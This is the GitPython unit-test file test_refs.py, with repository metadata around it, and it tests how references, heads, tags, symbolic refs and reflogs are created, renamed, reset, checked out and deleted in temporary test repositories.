venv/Lib/site-packages/git/test/test_refs.py
|
dhina016/OnCV
|
2429ba7bc8589e92b2c273af6e8763487e1e05a8
|
[
"Unlicense",
"MIT"
] | 5
|
2021-03-19T11:01:43.000Z
|
2022-02-10T12:02:58.000Z
|
venv/Lib/site-packages/git/test/test_refs.py
|
dhina016/OnCV
|
2429ba7bc8589e92b2c273af6e8763487e1e05a8
|
[
"Unlicense",
"MIT"
] | 1
|
2020-11-01T04:03:38.000Z
|
2020-11-01T04:03:38.000Z
|
# test_refs.py
# Copyright (C) 2008, 2009 Michael Trier (mtrier@gmail.com) and contributors
#
# This module is part of GitPython and is released under
# the BSD License: http://www.opensource.org/licenses/bsd-license.php
from itertools import chain
from git import (
Reference,
Head,
TagReference,
RemoteReference,
Commit,
SymbolicReference,
GitCommandError,
RefLog
)
from git.objects.tag import TagObject
from git.test.lib import (
TestBase,
with_rw_repo
)
from git.util import Actor
import git.refs as refs
import os.path as osp
class TestRefs(TestBase):
def test_from_path(self):
# should be able to create any reference directly
for ref_type in (Reference, Head, TagReference, RemoteReference):
for name in ('rela_name', 'path/rela_name'):
full_path = ref_type.to_full_path(name)
instance = ref_type.from_path(self.rorepo, full_path)
assert isinstance(instance, ref_type)
# END for each name
# END for each type
# invalid path
self.assertRaises(ValueError, TagReference, self.rorepo, "refs/invalid/tag")
# works without path check
TagReference(self.rorepo, "refs/invalid/tag", check_path=False)
def test_tag_base(self):
tag_object_refs = []
for tag in self.rorepo.tags:
assert "refs/tags" in tag.path
assert tag.name
assert isinstance(tag.commit, Commit)
if tag.tag is not None:
tag_object_refs.append(tag)
tagobj = tag.tag
# have no dict
self.assertRaises(AttributeError, setattr, tagobj, 'someattr', 1)
assert isinstance(tagobj, TagObject)
assert tagobj.tag == tag.name
assert isinstance(tagobj.tagger, Actor)
assert isinstance(tagobj.tagged_date, int)
assert isinstance(tagobj.tagger_tz_offset, int)
assert tagobj.message
assert tag.object == tagobj
# can't assign the object
self.assertRaises(AttributeError, setattr, tag, 'object', tagobj)
# END if we have a tag object
# END for tag in repo-tags
assert tag_object_refs
assert isinstance(self.rorepo.tags['0.1.5'], TagReference)
def test_tags_author(self):
tag = self.rorepo.tags[0]
tagobj = tag.tag
assert isinstance(tagobj.tagger, Actor)
tagger_name = tagobj.tagger.name
assert tagger_name == 'Michael Trier'
def test_tags(self):
# tag refs can point to tag objects or to commits
s = set()
ref_count = 0
for ref in chain(self.rorepo.tags, self.rorepo.heads):
ref_count += 1
assert isinstance(ref, refs.Reference)
assert str(ref) == ref.name
assert repr(ref)
assert ref == ref
assert not ref != ref
s.add(ref)
# END for each ref
assert len(s) == ref_count
assert len(s | s) == ref_count
@with_rw_repo('HEAD', bare=False)
def test_heads(self, rwrepo):
for head in rwrepo.heads:
assert head.name
assert head.path
assert "refs/heads" in head.path
prev_object = head.object
cur_object = head.object
assert prev_object == cur_object # represent the same git object
assert prev_object is not cur_object # but are different instances
with head.config_writer() as writer:
tv = "testopt"
writer.set_value(tv, 1)
assert writer.get_value(tv) == 1
assert head.config_reader().get_value(tv) == 1
with head.config_writer() as writer:
writer.remove_option(tv)
# after the clone, we might still have a tracking branch setup
head.set_tracking_branch(None)
assert head.tracking_branch() is None
remote_ref = rwrepo.remotes[0].refs[0]
assert head.set_tracking_branch(remote_ref) is head
assert head.tracking_branch() == remote_ref
head.set_tracking_branch(None)
assert head.tracking_branch() is None
special_name = 'feature#123'
special_name_remote_ref = SymbolicReference.create(rwrepo, 'refs/remotes/origin/%s' % special_name)
gp_tracking_branch = rwrepo.create_head('gp_tracking#123')
special_name_remote_ref = rwrepo.remotes[0].refs[special_name] # get correct type
gp_tracking_branch.set_tracking_branch(special_name_remote_ref)
assert gp_tracking_branch.tracking_branch().path == special_name_remote_ref.path
git_tracking_branch = rwrepo.create_head('git_tracking#123')
rwrepo.git.branch('-u', special_name_remote_ref.name, git_tracking_branch.name)
assert git_tracking_branch.tracking_branch().name == special_name_remote_ref.name
# END for each head
# verify REFLOG gets altered
head = rwrepo.head
cur_head = head.ref
cur_commit = cur_head.commit
pcommit = cur_head.commit.parents[0].parents[0]
hlog_len = len(head.log())
blog_len = len(cur_head.log())
assert head.set_reference(pcommit, 'detached head') is head
# one new log-entry
thlog = head.log()
assert len(thlog) == hlog_len + 1
assert thlog[-1].oldhexsha == cur_commit.hexsha
assert thlog[-1].newhexsha == pcommit.hexsha
# the ref didn't change though
assert len(cur_head.log()) == blog_len
# head changes once again, cur_head doesn't change
head.set_reference(cur_head, 'reattach head')
assert len(head.log()) == hlog_len + 2
assert len(cur_head.log()) == blog_len
# adjusting the head-ref also adjust the head, so both reflogs are
# altered
cur_head.set_commit(pcommit, 'changing commit')
assert len(cur_head.log()) == blog_len + 1
assert len(head.log()) == hlog_len + 3
# with automatic dereferencing
assert head.set_commit(cur_commit, 'change commit once again') is head
assert len(head.log()) == hlog_len + 4
assert len(cur_head.log()) == blog_len + 2
# a new branch has just a single entry
other_head = Head.create(rwrepo, 'mynewhead', pcommit, logmsg='new head created')
log = other_head.log()
assert len(log) == 1
assert log[0].oldhexsha == pcommit.NULL_HEX_SHA
assert log[0].newhexsha == pcommit.hexsha
def test_refs(self):
types_found = set()
for ref in self.rorepo.refs:
types_found.add(type(ref))
assert len(types_found) >= 3
def test_is_valid(self):
assert not Reference(self.rorepo, 'refs/doesnt/exist').is_valid()
assert self.rorepo.head.is_valid()
assert self.rorepo.head.reference.is_valid()
assert not SymbolicReference(self.rorepo, 'hellothere').is_valid()
def test_orig_head(self):
assert type(self.rorepo.head.orig_head()) == SymbolicReference
@with_rw_repo('0.1.6')
def test_head_checkout_detached_head(self, rw_repo):
res = rw_repo.remotes.origin.refs.master.checkout()
assert isinstance(res, SymbolicReference)
assert res.name == 'HEAD'
@with_rw_repo('0.1.6')
def test_head_reset(self, rw_repo):
cur_head = rw_repo.head
old_head_commit = cur_head.commit
new_head_commit = cur_head.ref.commit.parents[0]
cur_head.reset(new_head_commit, index=True) # index only
assert cur_head.reference.commit == new_head_commit
self.assertRaises(ValueError, cur_head.reset, new_head_commit, index=False, working_tree=True)
new_head_commit = new_head_commit.parents[0]
cur_head.reset(new_head_commit, index=True, working_tree=True) # index + wt
assert cur_head.reference.commit == new_head_commit
# paths - make sure we have something to do
rw_repo.index.reset(old_head_commit.parents[0])
cur_head.reset(cur_head, paths="test")
cur_head.reset(new_head_commit, paths="lib")
# hard resets with paths don't work, its all or nothing
self.assertRaises(GitCommandError, cur_head.reset, new_head_commit, working_tree=True, paths="lib")
# we can do a mixed reset, and then checkout from the index though
cur_head.reset(new_head_commit)
rw_repo.index.checkout(["lib"], force=True)
# now that we have a write write repo, change the HEAD reference - its
# like git-reset --soft
heads = rw_repo.heads
assert heads
for head in heads:
cur_head.reference = head
assert cur_head.reference == head
assert isinstance(cur_head.reference, Head)
assert cur_head.commit == head.commit
assert not cur_head.is_detached
# END for each head
# detach
active_head = heads[0]
curhead_commit = active_head.commit
cur_head.reference = curhead_commit
assert cur_head.commit == curhead_commit
assert cur_head.is_detached
self.assertRaises(TypeError, getattr, cur_head, "reference")
# tags are references, hence we can point to them
some_tag = rw_repo.tags[0]
cur_head.reference = some_tag
assert not cur_head.is_detached
assert cur_head.commit == some_tag.commit
assert isinstance(cur_head.reference, TagReference)
# put HEAD back to a real head, otherwise everything else fails
cur_head.reference = active_head
# type check
self.assertRaises(ValueError, setattr, cur_head, "reference", "that")
# head handling
commit = 'HEAD'
prev_head_commit = cur_head.commit
for count, new_name in enumerate(("my_new_head", "feature/feature1")):
actual_commit = commit + "^" * count
new_head = Head.create(rw_repo, new_name, actual_commit)
assert new_head.is_detached
assert cur_head.commit == prev_head_commit
assert isinstance(new_head, Head)
# already exists, but has the same value, so its fine
Head.create(rw_repo, new_name, new_head.commit)
# its not fine with a different value
self.assertRaises(OSError, Head.create, rw_repo, new_name, new_head.commit.parents[0])
# force it
new_head = Head.create(rw_repo, new_name, actual_commit, force=True)
old_path = new_head.path
old_name = new_head.name
assert new_head.rename("hello").name == "hello"
assert new_head.rename("hello/world").name == "hello/world"
assert new_head.rename(old_name).name == old_name and new_head.path == old_path
# rename with force
tmp_head = Head.create(rw_repo, "tmphead")
self.assertRaises(GitCommandError, tmp_head.rename, new_head)
tmp_head.rename(new_head, force=True)
assert tmp_head == new_head and tmp_head.object == new_head.object
logfile = RefLog.path(tmp_head)
assert osp.isfile(logfile)
Head.delete(rw_repo, tmp_head)
# deletion removes the log as well
assert not osp.isfile(logfile)
heads = rw_repo.heads
assert tmp_head not in heads and new_head not in heads
# force on deletion testing would be missing here, code looks okay though ;)
# END for each new head name
self.assertRaises(TypeError, RemoteReference.create, rw_repo, "some_name")
# tag ref
tag_name = "5.0.2"
TagReference.create(rw_repo, tag_name)
self.assertRaises(GitCommandError, TagReference.create, rw_repo, tag_name)
light_tag = TagReference.create(rw_repo, tag_name, "HEAD~1", force=True)
assert isinstance(light_tag, TagReference)
assert light_tag.name == tag_name
assert light_tag.commit == cur_head.commit.parents[0]
assert light_tag.tag is None
# tag with tag object
other_tag_name = "releases/1.0.2RC"
msg = "my mighty tag\nsecond line"
obj_tag = TagReference.create(rw_repo, other_tag_name, message=msg)
assert isinstance(obj_tag, TagReference)
assert obj_tag.name == other_tag_name
assert obj_tag.commit == cur_head.commit
assert obj_tag.tag is not None
TagReference.delete(rw_repo, light_tag, obj_tag)
tags = rw_repo.tags
assert light_tag not in tags and obj_tag not in tags
# remote deletion
remote_refs_so_far = 0
remotes = rw_repo.remotes
assert remotes
for remote in remotes:
refs = remote.refs
# If a HEAD exists, it must be deleted first. Otherwise it might
# end up pointing to an invalid ref it the ref was deleted before.
remote_head_name = "HEAD"
if remote_head_name in refs:
RemoteReference.delete(rw_repo, refs[remote_head_name])
del(refs[remote_head_name])
# END handle HEAD deletion
RemoteReference.delete(rw_repo, *refs)
remote_refs_so_far += len(refs)
for ref in refs:
assert ref.remote_name == remote.name
# END for each ref to delete
assert remote_refs_so_far
for remote in remotes:
# remotes without references should produce an empty list
self.assertEqual(remote.refs, [])
# END for each remote
# change where the active head points to
if cur_head.is_detached:
cur_head.reference = rw_repo.heads[0]
head = cur_head.reference
old_commit = head.commit
head.commit = old_commit.parents[0]
assert head.commit == old_commit.parents[0]
assert head.commit == cur_head.commit
head.commit = old_commit
# setting a non-commit as commit fails, but succeeds as object
head_tree = head.commit.tree
self.assertRaises(ValueError, setattr, head, 'commit', head_tree)
assert head.commit == old_commit # and the ref did not change
# we allow heds to point to any object
head.object = head_tree
assert head.object == head_tree
# cannot query tree as commit
self.assertRaises(TypeError, getattr, head, 'commit')
# set the commit directly using the head. This would never detach the head
assert not cur_head.is_detached
head.object = old_commit
cur_head.reference = head.commit
assert cur_head.is_detached
parent_commit = head.commit.parents[0]
assert cur_head.is_detached
cur_head.commit = parent_commit
assert cur_head.is_detached and cur_head.commit == parent_commit
cur_head.reference = head
assert not cur_head.is_detached
cur_head.commit = parent_commit
assert not cur_head.is_detached
assert head.commit == parent_commit
# test checkout
active_branch = rw_repo.active_branch
for head in rw_repo.heads:
checked_out_head = head.checkout()
assert checked_out_head == head
# END for each head to checkout
# checkout with branch creation
new_head = active_branch.checkout(b="new_head")
assert active_branch != rw_repo.active_branch
assert new_head == rw_repo.active_branch
# checkout with force as we have a changed a file
# clear file
open(new_head.commit.tree.blobs[-1].abspath, 'w').close()
assert len(new_head.commit.diff(None))
# create a new branch that is likely to touch the file we changed
far_away_head = rw_repo.create_head("far_head", 'HEAD~100')
self.assertRaises(GitCommandError, far_away_head.checkout)
assert active_branch == active_branch.checkout(force=True)
assert rw_repo.head.reference != far_away_head
# test reference creation
partial_ref = 'sub/ref'
full_ref = 'refs/%s' % partial_ref
ref = Reference.create(rw_repo, partial_ref)
assert ref.path == full_ref
assert ref.object == rw_repo.head.commit
self.assertRaises(OSError, Reference.create, rw_repo, full_ref, 'HEAD~20')
# it works if it is at the same spot though and points to the same reference
assert Reference.create(rw_repo, full_ref, 'HEAD').path == full_ref
Reference.delete(rw_repo, full_ref)
# recreate the reference using a full_ref
ref = Reference.create(rw_repo, full_ref)
assert ref.path == full_ref
assert ref.object == rw_repo.head.commit
# recreate using force
ref = Reference.create(rw_repo, partial_ref, 'HEAD~1', force=True)
assert ref.path == full_ref
assert ref.object == rw_repo.head.commit.parents[0]
# rename it
orig_obj = ref.object
for name in ('refs/absname', 'rela_name', 'feature/rela_name'):
ref_new_name = ref.rename(name)
assert isinstance(ref_new_name, Reference)
assert name in ref_new_name.path
assert ref_new_name.object == orig_obj
assert ref_new_name == ref
# END for each name type
# References that don't exist trigger an error if we want to access them
self.assertRaises(ValueError, getattr, Reference(rw_repo, "refs/doesntexist"), 'commit')
# exists, fail unless we force
ex_ref_path = far_away_head.path
self.assertRaises(OSError, ref.rename, ex_ref_path)
# if it points to the same commit it works
far_away_head.commit = ref.commit
ref.rename(ex_ref_path)
assert ref.path == ex_ref_path and ref.object == orig_obj
assert ref.rename(ref.path).path == ex_ref_path # rename to same name
# create symbolic refs
symref_path = "symrefs/sym"
symref = SymbolicReference.create(rw_repo, symref_path, cur_head.reference)
assert symref.path == symref_path
assert symref.reference == cur_head.reference
self.assertRaises(OSError, SymbolicReference.create, rw_repo, symref_path, cur_head.reference.commit)
# it works if the new ref points to the same reference
SymbolicReference.create(rw_repo, symref.path, symref.reference).path == symref.path # @NoEffect
SymbolicReference.delete(rw_repo, symref)
# would raise if the symref wouldn't have been deletedpbl
symref = SymbolicReference.create(rw_repo, symref_path, cur_head.reference)
# test symbolic references which are not at default locations like HEAD
# or FETCH_HEAD - they may also be at spots in refs of course
symbol_ref_path = "refs/symbol_ref"
symref = SymbolicReference(rw_repo, symbol_ref_path)
assert symref.path == symbol_ref_path
symbol_ref_abspath = osp.join(rw_repo.git_dir, symref.path)
# set it
symref.reference = new_head
assert symref.reference == new_head
assert osp.isfile(symbol_ref_abspath)
assert symref.commit == new_head.commit
for name in ('absname', 'folder/rela_name'):
symref_new_name = symref.rename(name)
assert isinstance(symref_new_name, SymbolicReference)
assert name in symref_new_name.path
assert symref_new_name.reference == new_head
assert symref_new_name == symref
assert not symref.is_detached
# END for each ref
# create a new non-head ref just to be sure we handle it even if packed
Reference.create(rw_repo, full_ref)
# test ref listing - assure we have packed refs
rw_repo.git.pack_refs(all=True, prune=True)
heads = rw_repo.heads
assert heads
assert new_head in heads
assert active_branch in heads
assert rw_repo.tags
# we should be able to iterate all symbolic refs as well - in that case
# we should expect only symbolic references to be returned
for symref in SymbolicReference.iter_items(rw_repo):
assert not symref.is_detached
# when iterating references, we can get references and symrefs
# when deleting all refs, I'd expect them to be gone ! Even from
# the packed ones
# For this to work, we must not be on any branch
rw_repo.head.reference = rw_repo.head.commit
deleted_refs = set()
for ref in Reference.iter_items(rw_repo):
if ref.is_detached:
ref.delete(rw_repo, ref)
deleted_refs.add(ref)
# END delete ref
# END for each ref to iterate and to delete
assert deleted_refs
for ref in Reference.iter_items(rw_repo):
if ref.is_detached:
assert ref not in deleted_refs
# END for each ref
# reattach head - head will not be returned if it is not a symbolic
# ref
rw_repo.head.reference = Head.create(rw_repo, "master")
# At least the head should still exist
assert osp.isfile(osp.join(rw_repo.git_dir, 'HEAD'))
refs = list(SymbolicReference.iter_items(rw_repo))
assert len(refs) == 1
# test creation of new refs from scratch
for path in ("basename", "dir/somename", "dir2/subdir/basename"):
# REFERENCES
############
fpath = Reference.to_full_path(path)
ref_fp = Reference.from_path(rw_repo, fpath)
assert not ref_fp.is_valid()
ref = Reference(rw_repo, fpath)
assert ref == ref_fp
# can be created by assigning a commit
ref.commit = rw_repo.head.commit
assert ref.is_valid()
# if the assignment raises, the ref doesn't exist
Reference.delete(ref.repo, ref.path)
assert not ref.is_valid()
self.assertRaises(ValueError, setattr, ref, 'commit', "nonsense")
assert not ref.is_valid()
# I am sure I had my reason to make it a class method at first, but
# now it doesn't make so much sense anymore, want an instance method as well
# See http://byronimo.lighthouseapp.com/projects/51787-gitpython/tickets/27
Reference.delete(ref.repo, ref.path)
assert not ref.is_valid()
ref.object = rw_repo.head.commit
assert ref.is_valid()
Reference.delete(ref.repo, ref.path)
assert not ref.is_valid()
self.assertRaises(ValueError, setattr, ref, 'object', "nonsense")
assert not ref.is_valid()
# END for each path
def test_dereference_recursive(self):
# for now, just test the HEAD
assert SymbolicReference.dereference_recursive(self.rorepo, 'HEAD')
def test_reflog(self):
assert isinstance(self.rorepo.heads.master.log(), RefLog)
| 40.908612
| 111
| 0.63479
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.